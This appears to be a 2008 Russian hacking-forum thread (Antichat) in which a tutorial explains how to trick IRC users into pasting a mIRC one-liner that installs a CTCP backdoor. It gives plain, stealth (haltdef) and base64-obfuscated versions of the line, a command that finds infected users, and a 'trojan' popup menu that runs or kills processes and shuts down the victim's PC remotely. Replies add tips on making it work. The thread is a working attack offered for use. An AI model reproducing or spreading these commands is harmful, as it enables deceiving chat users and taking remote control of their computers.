Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   mirc backdoor (https://forum.antichat.xyz/showthread.php?t=68656)

CrazyStudentS_Mi}{ 28.04.2008 12:55
mirc backdoor
 
Интернет кишит статьями о том что можно заразить mirc клиент простейшим бэкдором, который будет работать через ctcp запросы, везде он описывается так:
Код:
//write conf.mrc ctcp 1:*:?:$1- | Load -rs conf.mrc
Это должна набрать наша жертва, тоесть создается файл-скрипт и подгружается в клиент.Но есть один огромный минус такого бэкдора - все наши ctcp запросы будут палиться в статусе. Как же этого избежать? Если покопаться в хэлпе то нетрудно найти алиас haltdef блокирующий стандартный ответ на вызванную команду\алиас\функцию.

Чуть чуть поэкпериментировав пришли к такому бэкдору
Код:
//write config.mrc ctcp ^*:*:*: { haltdef | $1- } | //Load -rs config.mrc
Но для человека хоть чуточку понимающего в скриптинге\кодинге покажется опасной такая строка.
Лучше просто обходить бдительных людей стороной или брать их на слабо :))

Благо mirc богат своими функциями и позволяет кодировать команды. В результате имеем такой код бэкдора
Код:
//write conf.mrc $decode(Y3RjcCBeKjoqOio6IHsgaGFsdGRlZiB8ICQxLSB9,m) | load -rs conf.mrc
Такое кажется втюхать соседям по чату труднее, но это только кажется, ведь все проявляют интерес что же это, можнопросто написать это на канале и найдутся те кто посмотрят, что она выполняет.
После того как вы попестрите этим сообщением нужно собирать первые плоды - например ctcp запрос на канал, который выявит заразившихся:
Код:
/ctcp #chan /ping $me
После сбора урожая в отдельный текстовичок можно приступить к работе с конкретными особями.
Вставим этот код в Скрипты(Alt+R)->Меню->Приват
Код:
Троян
.выполнить:/ctcp $$1 $$?="ВВеди чего хочешь делать"
.запуск процесса:/ctcp $$1 /run $$?="ВВеди название или путь к процессу"
.остановка процесса:/ctcp $$1 /run taskkill /F /IM $$?="ВВеди название или путь к процессу"
.смена ника:/ctcp $$1 /nick $$?="ВВеди ник"
.зайти на канал:/ctcp $$1 /join $$?="ВВеди канал"
.покинуть канал:/ctcp $$1 /part $$?="ВВеди канал"
.сказать:/ctcp $$1 /say $$?="Что сказать?"
.вырубить винду:/ctcp $$1 /run exitwindows
.перезагрузить комп:/ctcp $$1 /run shutdown -r -f -m
Удачного веселья!

elimS2 28.04.2008 13:40
вообще-то если ты такой бекдор успешно кому-то впарил, то тут уже можно и троян впаривать полноценный, главное знать хорошо командную строку. decode по умолчанию в мирке отключен, потому его сначала стоит включить

CrazyStudentS_Mi}{ 28.04.2008 19:59
Цитата:
Сообщение от c411k
ебаа ты нам открыл глаза, боян шопездец.

заметь тут написано что тема боян, но в нее внесен важный новый аспект - отсутствие палевности твоего присутствия

47726573684e 03.05.2008 07:54
Хы а кто миркой пользуеться? Лично я давно юзаю MegaIrc тама токого не катит :)...

CrazyStudentS_Mi}{ 03.05.2008 11:32
Цитата:
Сообщение от 47726573684e
Хы а кто миркой пользуеться? Лично я давно юзаю MegaIrc тама токого не катит :)...

сам mirc юзает минимальное количество людей, зато его производные и зточенные под себя скрипты юзает более половины пользователей IRC

AdReNa1!Ne 03.05.2008 11:43
Кстати во многих крупных ирц сетях (например dogm.net) стоит фильтр на такое. Так что требуется более извращенный метод))

elimS2 03.05.2008 11:45
/me использует нулевой мирк с своими написаными сверху скриптами


Время: 01:45